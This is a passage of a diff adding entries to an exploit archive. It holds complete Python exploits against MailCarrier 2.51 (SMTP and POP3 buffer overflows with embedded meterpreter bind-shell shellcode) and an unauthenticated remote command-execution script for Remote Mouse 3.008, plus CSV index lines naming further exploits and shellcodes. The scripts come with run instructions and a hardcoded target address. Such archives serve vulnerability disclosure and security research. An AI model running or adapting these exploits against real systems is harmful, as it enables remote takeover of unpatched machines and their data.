+"\x68\x70\x6e\x55\x6e\x42\x63\x66\x33\x5a\x33\x30\x50\x53\x69"
+"\x6f\x58\x55\x41\x41")
+
+buffer = "A" * 5090 + "\xf7\x56\x44\x7e" + "\x90" * 20 + shellcode + "B" * 100
+
+print "[*] Sending pwnage buffer: with %s bytes" %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 25))
+print s.recv(1024)
+s.send('EHLO root@telspace.co.za \r\n')
+print s.recv(1024)
+s.send('MAIL FROM: pwnz@telspace.co.za \r\n')
+print s.recv(1024)
+s.send('RCPT TO: '+ buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"

exploits/windows/remote/46697.py

@@ -0,0 +1,136 @@
+"""
+# Exploit Title: Remote Mouse 3.008 Failure to Authenticate
+# Date: 4/9/2019
+# Exploit Author: 0rphon
+# Software Link: https://www.remotemouse.net/
+# Version: 3.008
+# Tested on: Windows 10
+
+Remote Mouse 3.008 fails to check for authenication and will execute any command any machine gives it
+This script pops calc as proof of concept (albeit a bit slowly)
+It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
+"""
+
+#!/usr/bin/python2
+from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
+from time import sleep
+from sys import argv
+
+def Ping(ip):
+    try:
+        target = socket(AF_INET, SOCK_STREAM)
+        target.settimeout(5)
+        target.connect((ip, 1978))
+        response=target.recv(1048)
+        target.close()
+        if response=="SIN 15win nop nop 300":
+            return True
+        else: return False
+    except:
+        print("ERROR: Request timed out")
+
+
+
+def MoveMouse(x,y,ip):
+    def SendMouse(command,times,ip):
+        for x in range(times):
+            target = socket(AF_INET, SOCK_DGRAM)
+            target.sendto(command,(ip,1978))
+            sleep(0.001)
+    if x>0:
+        command="mos  5m 1 0"
+        SendMouse(command,x,ip)
+    elif x<0:
+        x=x*-1
+        command="mos  5m -1 0"
+        SendMouse(command,x,ip)
+    if y>0:
+        command="mos  5m 0 1"
+        SendMouse(command,y,ip)
+    elif y<0:
+        y=y*-1
+        command="mos  6m 0 -1"
+        SendMouse(command,y,ip)
+
+
+
+def MousePress(command,ip,action="click"):
+    if action=="down":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" d"),(ip,1978))
+    elif action=="up":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" u"),(ip,1978))
+    elif action=="click":
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto((command+" d"),(ip,1978))
+        target.sendto((command+" u"),(ip,1978))
+    else: raise Exception('MousePress: No action named "'+str(action)+'"')
+
+
+def SendString(string,ip):
+    for char in string:
+        target = socket(AF_INET, SOCK_DGRAM)
+        target.sendto(characters[char],(ip,1978))
+    
+
+
+class mouse:
+    leftClick="mos  5R l"
+    rightClick="mos  5R r"
+    middleClick="mos  5R m"
+
+characters={
+    "A":"key  8[ras]116", "B":"key  8[ras]119", "C":"key  8[ras]118", "D":"key  8[ras]113", "E":"key  8[ras]112", 
+    "F":"key  8[ras]115", "G":"key  8[ras]114", "H":"key  8[ras]125", "I":"key  8[ras]124", "J":"key  8[ras]127", 
+    "K":"key  8[ras]126", "L":"key  8[ras]121", "M":"key  8[ras]120", "N":"key  8[ras]123", "O":"key  8[ras]122", 
+    "P":"key  8[ras]101", "Q":"key  8[ras]100", "R":"key  8[ras]103", "S":"key  8[ras]102", "T":"key  7[ras]97", 
+    "U":"key  7[ras]96", "V":"key  7[ras]99", "W":"key  7[ras]98", "X":"key  8[ras]109", "Y":"key  8[ras]108", 
+    "Z":"key  8[ras]111",
+
+    "a":"key  7[ras]84", "b":"key  7[ras]87", "c":"key  7[ras]86", "d":"key  7[ras]81", "e":"key  7[ras]80", 
+    "f":"key  7[ras]83", "g":"key  7[ras]82", "h":"key  7[ras]93", "i":"key  7[ras]92", "j":"key  7[ras]95", 
+    "k":"key  7[ras]94", "l":"key  7[ras]89", "m":"key  7[ras]88", "n":"key  7[ras]91", "o":"key  7[ras]90", 
+    "p":"key  7[ras]69", "q":"key  7[ras]68", "r":"key  7[ras]71", "s":"key  7[ras]70", "t":"key  7[ras]65", 
+    "u":"key  7[ras]64", "v":"key  7[ras]67", "w":"key  7[ras]66", "x":"key  7[ras]77", "y":"key  7[ras]76", 
+    "z":"key  7[ras]79",
+
+    "1":"key  6[ras]4", "2":"key  6[ras]7", "3":"key  6[ras]6", "4":"key  6[ras]1", "5":"key  6[ras]0",
+    "6":"key  6[ras]3", "7":"key  6[ras]2", "8":"key  6[ras]13", "9":"key  6[ras]12", "x0":"key  6[ras]5",
+
+    "\n":"key  3RTN", "\b":"key  3BAS", " ":"key  7[ras]21",
+
+    "+":"key  7[ras]30", "=":"key  6[ras]8", "/":"key  7[ras]26", "_":"key  8[ras]106", "<":"key  6[ras]9", 
+    ">":"key  7[ras]11", "[":"key  8[ras]110", "]":"key  8[ras]104", "!":"key  7[ras]20", "@":"key  8[ras]117", 
+    "#":"key  7[ras]22", "$":"key  7[ras]17", "%":"key  7[ras]16", "^":"key  8[ras]107", "&":"key  7[ras]19", 
+    "*":"key  7[ras]31", "(":"key  7[ras]29", ")":"key  7[ras]28", "-":"key  7[ras]24", "'":"key  7[ras]18", 
+    '"':"key  7[ras]23", ":":"key  7[ras]15", ";":"key  7[ras]14", "?":"key  7[ras]10", "`":"key  7[ras]85", 
+    "~":"key  7[ras]75", "\\":"key  8[ras]105", "|":"key  7[ras]73", "{":"key  7[ras]78", "}":"key  7[ras]72",
+    ",":"key  7[ras]25", ".":"key  7[ras]27"
+}
+
+
+def PopCalc(ip):
+    MoveMouse(-5000,3000,ip)
+    MousePress(mouse.leftClick,ip)
+    sleep(1)
+    SendString("calc.exe",ip)
+    sleep(1)
+    SendString("\n",ip)
+    print("SUCCESS! Process calc.exe has run on target",ip)
+
+
+def main():
+    try:
+        targetIP=argv[1]
+    except:
+        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
+        exit()
+    if Ping(targetIP)==True:
+        PopCalc(targetIP)
+    else:
+        print("ERROR: Target machine is not running RemoteMouse")
+        exit()
+
+if __name__=="__main__":
+    main()

exploits/windows/remote/46699.py

@@ -0,0 +1,60 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - Remote Buffer Overflow in "USER" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - Vanilla EIP Overwrite
+# POC
+# 1.) Change ip and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+# 0x1b023059 : push esp # ret 0x10 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+# Badchars \x00\xd9
+
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -b "\x00\xd9" -f c
+shellcode = ("\x29\xc9\x83\xe9\xb2\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
+"\x44\x9b\x1b\x0b\x83\xee\xfc\xe2\xf4\xb8\x73\x99\x0b\x44\x9b"
+"\x7b\x82\xa1\xaa\xdb\x6f\xcf\xcb\x2b\x80\x16\x97\x90\x59\x50"
+"\x10\x69\x23\x4b\x2c\x51\x2d\x75\x64\xb7\x37\x25\xe7\x19\x27"
+"\x64\x5a\xd4\x06\x45\x5c\xf9\xf9\x16\xcc\x90\x59\x54\x10\x51"
+"\x37\xcf\xd7\x0a\x73\xa7\xd3\x1a\xda\x15\x10\x42\x2b\x45\x48"
+"\x90\x42\x5c\x78\x21\x42\xcf\xaf\x90\x0a\x92\xaa\xe4\xa7\x85"
+"\x54\x16\x0a\x83\xa3\xfb\x7e\xb2\x98\x66\xf3\x7f\xe6\x3f\x7e"
+"\xa0\xc3\x90\x53\x60\x9a\xc8\x6d\xcf\x97\x50\x80\x1c\x87\x1a"
+"\xd8\xcf\x9f\x90\x0a\x94\x12\x5f\x2f\x60\xc0\x40\x6a\x1d\xc1"
+"\x4a\xf4\xa4\xc4\x44\x51\xcf\x89\xf0\x86\x19\xf3\x28\x39\x44"
+"\x9b\x73\x7c\x37\xa9\x44\x5f\x2c\xd7\x6c\x2d\x43\x64\xce\xb3"
+"\xd4\x9a\x1b\x0b\x6d\x5f\x4f\x5b\x2c\xb2\x9b\x60\x44\x64\xce"
+"\x61\x4f\xc2\x4b\xe9\xb9\xf1\x1a\x61\x46\xf3\xf1\x04\x9b\x7b"
+"\xe4\xde\xd3\xf3\x19\x0b\x45\x20\x92\xed\x2e\x8b\x4d\x5c\x2c"
+"\x59\xc0\x3c\x23\x64\xce\x8e\x84\xee\x43\x5c\x2c\x2c\xf2\x33"
+"\xbb\x64\xce\x5c\x2c\xef\xf7\x30\xa5\x64\xce\x5c\xd3\xf3\x6e"
+"\x65\x09\xfa\xe4\xde\x2e\x9b\x71\x0f\x12\xcc\x73\x09\x9d\x53"
+"\x44\xf4\x91\x18\xe3\x0b\x3a\xb6\x90\x3d\x2e\xdb\x73\x0b\x54"
+"\x9b\x1b\x5d\x2e\x9b\x73\x53\xe0\xc8\xfe\xf4\x91\x08\x48\x61"
+"\x44\xcd\x48\x5c\x2c\x99\xc2\xc3\x1b\x64\xce\x88\xbc\x9b\x65"
+"\x0c\x45\x58\x32\xcd\x31\x72\xd8\xb0\xb4\x2e\xb9\x5d\x2e\x9b"
+"\x48\xf4\x91\x9b\x1b\x0b")
+
+buffer = "A" * 5094 + "\x59\x30\x02\x1b" + "\x90" * 20 + shellcode + "C" * (882-len(shellcode))
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+s.send('USER ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"

exploits/windows/remote/46700.py

@@ -0,0 +1,89 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "LIST" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#nseh 6178 seh 6182
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6174 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (3798-(len(shellcode)))
+
+print "[*] MailCarrier 2.51 POP3 Buffer Overflow in LIST command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending Evil LIST buffer\r\n"
+s.send('LIST ' + buffer + '\r\n')
+print s.recv(1024)
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, but if you get here the exploit failed!"

exploits/windows/remote/46701.py

@@ -0,0 +1,88 @@
+#!/usr/bin/python
+# Exploit Title: MailCarrier 2.51 - SEH Remote Buffer Overflow in "TOP" command(POP3)
+# Date: 14/04/2019
+# Exploit Author: Dino Covotsos - Telspace Systems
+# Vendor Homepage: https://www.tabslab.com/
+# Version: 2.51
+# Software Link: N.A
+# Contact: services[@]telspace.co.za
+# Twitter: @telspacesystems (Greets to the Telspace Crew)
+# Tested on: Windows XP Prof SP3 ENG x86
+# CVE: TBC from Mitre
+# Created for the Telspace Internship 2019 - SEH Exploit
+# POC
+# 1.) Change ip, username, password and port in code
+# 2.) Run script against target, meterpreter bind shell waiting for you on port 443 on the target machine
+#0x1b0d110c : pop ecx # pop ecx # ret 0x08 | ascii {PAGE_EXECUTE_READ} [msjet40.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v4.00.9514.0 (C:\WINDOWS\system32\msjet40.dll)
+#crash at 6175
+import sys
+import socket
+import time
+
+#msfvenom -a x86 --platform windows -p windows/meterpreter/bind_tcp LPORT=443 -e x86/alpha_mixed -b "\x00\xd5\x0a\x0d\x1a\x03" -f c
+shellcode = ("\x89\xe1\xdb\xcb\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
+"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
+"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+"\x69\x6c\x78\x68\x6f\x72\x47\x70\x37\x70\x53\x30\x31\x70\x4f"
+"\x79\x58\x65\x66\x51\x49\x50\x50\x64\x4c\x4b\x50\x50\x56\x50"
+"\x4e\x6b\x56\x32\x74\x4c\x6e\x6b\x50\x52\x36\x74\x6c\x4b\x63"
+"\x42\x36\x48\x66\x6f\x58\x37\x52\x6a\x35\x76\x76\x51\x69\x6f"
+"\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x75\x52\x64\x6c\x47\x50\x69"
+"\x51\x4a\x6f\x34\x4d\x37\x71\x38\x47\x58\x62\x6c\x32\x62\x72"
+"\x70\x57\x6c\x4b\x52\x72\x42\x30\x4e\x6b\x53\x7a\x65\x6c\x6e"
+"\x6b\x30\x4c\x42\x31\x33\x48\x78\x63\x31\x58\x55\x51\x4b\x61"
+"\x66\x31\x6c\x4b\x50\x59\x37\x50\x67\x71\x38\x53\x6e\x6b\x33"
+"\x79\x65\x48\x6a\x43\x75\x6a\x62\x69\x6c\x4b\x56\x54\x6e\x6b"
+"\x37\x71\x38\x56\x55\x61\x39\x6f\x4c\x6c\x4a\x61\x78\x4f\x46"
+"\x6d\x37\x71\x49\x57\x66\x58\x69\x70\x31\x65\x6b\x46\x55\x53"
+"\x51\x6d\x69\x68\x65\x6b\x61\x6d\x51\x34\x74\x35\x6a\x44\x70"
+"\x58\x6c\x4b\x30\x58\x55\x74\x65\x51\x6b\x63\x61\x76\x6e\x6b"
+"\x76\x6c\x30\x4b\x6e\x6b\x71\x48\x47\x6c\x33\x31\x7a\x73\x4c"
+"\x4b\x55\x54\x6c\x4b\x77\x71\x6e\x30\x4b\x39\x32\x64\x34\x64"
+"\x36\x44\x61\x4b\x51\x4b\x45\x31\x30\x59\x52\x7a\x42\x71\x59"
+"\x6f\x69\x70\x53\x6f\x33\x6f\x72\x7a\x4c\x4b\x34\x52\x78\x6b"
+"\x6c\x4d\x63\x6d\x71\x78\x50\x33\x77\x42\x55\x50\x53\x30\x33"
+"\x58\x70\x77\x70\x73\x30\x32\x31\x4f\x61\x44\x42\x48\x30\x4c"
+"\x54\x37\x76\x46\x34\x47\x59\x6f\x78\x55\x78\x38\x4c\x50\x33"
+"\x31\x65\x50\x35\x50\x35\x79\x48\x44\x50\x54\x30\x50\x75\x38"
+"\x56\x49\x6f\x70\x62\x4b\x75\x50\x69\x6f\x68\x55\x73\x5a\x74"
+"\x4b\x42\x79\x62\x70\x79\x72\x59\x6d\x53\x5a\x63\x31\x52\x4a"
+"\x67\x72\x65\x38\x6b\x5a\x74\x4f\x79\x4f\x69\x70\x69\x6f\x48"
+"\x55\x5a\x37\x31\x78\x44\x42\x73\x30\x33\x31\x4d\x6b\x6e\x69"
+"\x38\x66\x70\x6a\x76\x70\x70\x56\x72\x77\x53\x58\x6f\x32\x59"
+"\x4b\x46\x57\x73\x57\x39\x6f\x38\x55\x6d\x55\x39\x50\x43\x45"
+"\x61\x48\x53\x67\x65\x38\x4e\x57\x59\x79\x66\x58\x4b\x4f\x6b"
+"\x4f\x59\x45\x43\x67\x75\x38\x51\x64\x58\x6c\x77\x4b\x39\x71"
+"\x69\x6f\x49\x45\x32\x77\x4d\x47\x42\x48\x43\x45\x32\x4e\x52"
+"\x6d\x50\x61\x4b\x4f\x39\x45\x52\x4a\x67\x70\x53\x5a\x74\x44"
+"\x73\x66\x42\x77\x53\x58\x43\x32\x7a\x79\x39\x58\x63\x6f\x79"
+"\x6f\x6e\x35\x4d\x53\x4c\x38\x65\x50\x73\x4e\x46\x4d\x4e\x6b"
+"\x66\x56\x30\x6a\x57\x30\x65\x38\x33\x30\x62\x30\x77\x70\x75"
+"\x50\x63\x66\x70\x6a\x65\x50\x52\x48\x61\x48\x39\x34\x61\x43"
+"\x69\x75\x69\x6f\x38\x55\x7a\x33\x50\x53\x31\x7a\x45\x50\x66"
+"\x36\x51\x43\x76\x37\x31\x78\x43\x32\x69\x49\x6f\x38\x51\x4f"
+"\x4b\x4f\x39\x45\x4d\x53\x69\x68\x43\x30\x63\x4e\x73\x37\x67"
+"\x71\x4a\x63\x44\x69\x5a\x66\x73\x45\x38\x69\x6a\x63\x6f\x4b"
+"\x4a\x50\x4c\x75\x4e\x42\x42\x76\x33\x5a\x37\x70\x63\x63\x69"
+"\x6f\x78\x55\x41\x41")
+
+buffer = "A" * 6175 + "\xeb\x11\x90\x90" + "\x0c\x11\x0d\x1b" + "\x90" * 20 + shellcode + "D" * (10000-6883)
+
+print "[*] Mail Server 2.51 POP3 Buffer Overflow in TOP command\r\n"
+print "[*] Sending pwnage buffer: with %s bytes..." %len(buffer)
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+connect=s.connect(("192.168.0.150", 110))
+print s.recv(1024)
+print "[*] Sending USERNAME\r\n"
+s.send('USER test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending PASSWORD\r\n"
+s.send('PASS test' + '\r\n')
+print s.recv(1024)
+print "[*] Sending TOP command plus evil buffer\r\n"
+s.send('TOP ' + buffer + '\r\n')
+s.send('QUIT\r\n')
+s.close()
+time.sleep(1)
+print "[*] Done, check for meterpreter shell on port 443 of the target!"

files_exploits.csv

@@ -6382,6 +6382,8 @@ id,file,description,date,author,type,platform,port
 46652,exploits/multiple/dos/46652.txt,"Google Chrome 72.0.3626.81 - 'V8TrustedTypePolicyOptions::ToImpl' Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
 46653,exploits/multiple/dos/46653.html,"Google Chrome 73.0.3683.39 / Chromium 74.0.3712.0 - 'ReadableStream' Internal Object Leak Type Confusion",2019-04-03,"Google Security Research",dos,multiple,
 46656,exploits/windows/dos/46656.py,"Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)",2019-04-04,"Alejandra Sánchez",dos,windows,
+46702,exploits/windows/dos/46702.py,"UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
+46703,exploits/windows/dos/46703.py,"UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)",2019-04-15,"Victor Mondragón",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -17315,6 +17317,13 @@ id,file,description,date,author,type,platform,port
 46678,exploits/hardware/remote/46678.py,"TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow",2019-04-09,"Grzegorz Wypych",remote,hardware,80
 46682,exploits/multiple/remote/46682.py,"Apache Axis 1.4 - Remote Code Execution",2019-04-09,"David Yesland",remote,multiple,
 46693,exploits/linux/remote/46693.rb,"Zimbra Collaboration - Autodiscover Servlet XXE and ProxyServlet SSRF (Metasploit)",2019-04-12,Metasploit,remote,linux,8443
+46695,exploits/windows/remote/46695.py,"MailCarrier 2.51 - 'RCPT TO' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,25
+46697,exploits/windows/remote/46697.py,"RemoteMouse 3.008 - Arbitrary Remote Command Execution",2019-04-15,0rphon,remote,windows,
+46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php,
+46699,exploits/windows/remote/46699.py,"MailCarrier 2.51 - POP3 'USER' Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46700,exploits/windows/remote/46700.py,"MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46701,exploits/windows/remote/46701.py,"MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow",2019-04-15,"Dino Covotsos",remote,windows,110
+46705,exploits/hardware/remote/46705.rb,"Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)",2019-04-15,Metasploit,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41116,6 +41125,7 @@ id,file,description,date,author,type,platform,port
 46643,exploits/php/webapps/46643.txt,"Ashop Shopping Cart Software - SQL Injection",2019-04-03,"Ahmet Ümit BAYRAM",webapps,php,80
 46644,exploits/php/webapps/46644.txt,"PhreeBooks ERP 5.2.3 - Arbitrary File Upload",2019-04-03,"Abdullah Çelebi",webapps,php,80
 46658,exploits/php/webapps/46658.py,"FreeSMS 2.1.2 - SQL Injection (Authentication Bypass)",2019-04-04,"Yilmaz Degirmenci",webapps,php,80
+46659,exploits/jsp/webapps/46659.py,"Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation",2019-04-05,"Ata Hakçıl_ Melih Kaan Yıldız",webapps,jsp,
 46661,exploits/php/webapps/46661.html,"WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery",2019-04-05,"Peyman Forouzan",webapps,php,
 46663,exploits/php/webapps/46663.txt,"Jobgator - 'experience' SQL Injection",2019-04-08,"Ahmet Ümit BAYRAM",webapps,php,80
 46664,exploits/php/webapps/46664.html,"Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution",2019-04-08,FelipeGaspar,webapps,php,80
@@ -41129,3 +41139,4 @@ id,file,description,date,author,type,platform,port
 46684,exploits/php/webapps/46684.py,"Dell KACE Systems Management Appliance (K1000) 6.4.120756 - Unauthenticated Remote Code Execution",2019-04-10,"Julien Ahrens",webapps,php,443
 46687,exploits/hardware/webapps/46687.txt,"D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting",2019-04-10,"Semen Alexandrovich Lyhin",webapps,hardware,80
 46691,exploits/php/webapps/46691.rb,"ATutor < 2.2.4 - 'file_manager' Remote Code Execution (Metasploit)",2019-04-12,AkkuS,webapps,php,
+46694,exploits/php/webapps/46694.txt,"DirectAdmin 1.561 - Multiple Vulnerabilities",2019-04-15,InfinitumIT,webapps,php,

files_shellcodes.csv

@@ -955,3 +955,5 @@ id,file,description,date,author,type,platform
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
